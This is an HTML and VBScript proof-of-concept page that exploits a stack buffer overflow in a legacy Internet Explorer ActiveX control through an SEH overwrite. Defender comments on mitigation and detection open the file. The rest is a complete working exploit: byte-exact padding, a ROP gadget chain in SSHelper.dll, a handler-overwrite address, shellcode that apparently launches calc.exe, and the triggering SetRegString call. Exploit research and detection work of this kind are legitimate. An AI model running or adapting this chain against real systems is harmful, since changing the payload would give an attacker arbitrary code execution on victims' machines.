<!--
  Proof-of-concept page for an SEH-overwrite stack buffer overflow in an
  ActiveX control. The control is instantiated by CLSID below and, per the
  script's own annotations, every gadget address lives in SSHelper.dll.
  It only runs in legacy Internet Explorer with VBScript enabled; current
  browsers do not execute language='vbscript' at all.
  Defender notes:
    * Mitigation: set the Internet Explorer kill bit for this CLSID (or remove
      the control). The annotated addresses are absolute, which presumably
      means SSHelper.dll loads at a fixed base without ASLR and lacks SafeSEH
      (confirm from the module's PE headers); system-wide SEHOP and mandatory
      ASLR exploit protections would break this specific chain.
    * Detection: String(n, "X") paddings of thousands of bytes, unescape() of
      raw byte runs, and a single control method call receiving the assembled
      buffer are the observable indicators in page content.
-->
<html>
<object classid='clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9' id='target'></object>
<script language='vbscript'>
' Padding blocks. The concatenation order in arg3 below fixes where each
' piece lands in the overflowed frame, so these sizes are byte-exact.
junk1 = String(72, "A")
junk2 = String(3184, "B")
junk3 = String(25000, "C")
' Seven copies of the same RETN address form a ROP-style "NOP sled"
' (as labelled in the original annotations).
nop1 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
nop2 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
nop3 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
nop4 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
nop5 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
nop6 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
nop7 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
nop = nop1 + nop2 + nop3 + nop4 + nop5 + nop6 + nop7
' Gadget chain. All addresses are absolute per the annotations, i.e. the chain
' presumably assumes a non-ASLR load of SSHelper.dll (confirm against the
' binary). The non-annotated constants are data values consumed by gadgets.
rop1 = unescape("%33%b6%44%06") ' SSHelper.dll | POP EBP / RETN
rop2 = unescape("%10%c0%1f%06") ' SSHelper.dll
rop3 = unescape("%65%b9%47%06") ' SSHelper.dll | MOV EDX,EBP / POP EDI / POP ESI / POP EBP / POP EBX / POP ECX / RETN
rop4 = unescape("%51%a5%45%06") ' SSHelper.dll | CALL EAX
rop5 = unescape("%ff%ff%ff%ff") ' 0xFFFFFFFF
rop6 = unescape("%6c%c4%24%23") ' 0x2324C46C
rop7 = unescape("%49%cc%ba%f9") ' 0xF9BACC49
rop8 = unescape("%aa%aa%aa%aa") ' 0xAAAAAAAA
rop9 = unescape("%6b%28%44%06") ' SSHelper.dll | XCHG EAX,EBP / RETN
rop10 = unescape("%ff%4b%46%06") ' SSHelper.dll | ADD EAX,0x595B5E5F / RETN
rop11 = unescape("%6b%28%44%06") ' SSHelper.dll | XCHG EAX,EBP / RETN
rop12 = unescape("%0e%37%45%06") ' SSHelper.dll | MOV EAX,0x64536B7 / RETN
rop13 = unescape("%d9%c4%47%06") ' SSHelper.dll | ADD EBX,EAX / PUSH 0x1 / POP EAX / RETN
rop14 = unescape("%05%67%47%06") ' SSHelper.dll | POP EAX / RETN
rop15 = unescape("%b0%c3%24%23") ' 0x2324C3B0
rop16 = unescape("%ff%4b%46%06") ' SSHelper.dll | ADD EAX,0x595B5E5F / RETN
rop17 = unescape("%71%03%4a%06") ' SSHelper.dll | PUSHAD / ADD AL,0x0 / RETN
ROPgadgets = nop + rop1 + rop2 + rop3 + rop4 + rop5 + rop6 + rop7 + rop8 + rop9 + rop10 + rop11 + rop12 + rop13 + rop14 + rop15 + rop16 + rop17
' Value that overwrites the SEH handler pointer. It points into SSHelper.dll
' rather than a registered handler, which presumably means the module lacks
' SafeSEH (confirm); SEHOP would reject this chain.
SEH = unescape("%13%16%47%06") ' SSHelper.dll | ADD ESP,0x46C
' Opaque shellcode blob. Its trailing bytes %63%61%6c%63%2e%65%78%65%00 are
' the NUL-terminated ASCII string "calc.exe", the usual harmless PoC marker.
payload =unescape( 
"%fc%e8%89%00%00%00%60%89%e5%31%d2%64%8b%52" & _
"%30%8b%52%0c%8b%52%14%8b%72%28%0f%b7%4a%26" & _
"%31%ff%31%c0%ac%3c%61%7c%02%2c%20%c1%cf%0d" & _
"%01%c7%e2%f0%52%57%8b%52%10%8b%42%3c%01%d0" & _
"%8b%40%78%85%c0%74%4a%01%d0%50%8b%48%18%8b" & _
"%58%20%01%d3%e3%3c%49%8b%34%8b%01%d6%31%ff" & _
"%31%c0%ac%c1%cf%0d%01%c7%38%e0%75%f4%03%7d" & _
"%f8%3b%7d%24%75%e2%58%8b%58%24%01%d3%66%8b" & _
"%0c%4b%8b%58%1c%01%d3%8b%04%8b%01%d0%89%44" & _
"%24%24%5b%5b%61%59%5a%51%ff%e0%58%5f%5a%8b" & _
"%12%eb%86%5d%6a%01%8d%85%b9%00%00%00%50%68" & _
"%31%8b%6f%87%ff%d5%bb%f0%b5%a2%56%68%a6%95" & _
"%bd%9d%ff%d5%3c%06%7c%0a%80%fb%e0%75%05%bb" & _
"%47%13%72%6f%6a%00%53%ff%d5%63%61%6c%63%2e" & _
"%65%78%65%00")
' Method arguments. arg3 is the assembled overflow buffer; the remaining
' arguments look like placeholder values (verify against the control's IDL).
arg1 = 1
arg2 = 1
arg3 = junk1 + ROPgadgets + junk2 + SEH + payload + junk3
arg4 = "defaultV"
arg5 = "defaultV"
' Trigger: the oversized third argument passed to SetRegString. A detection
' rule can key on script calling this CLSID's SetRegString with a
' multi-kilobyte string argument.
target.SetRegString arg1, arg2, arg3, arg4, arg5
</script>
</html>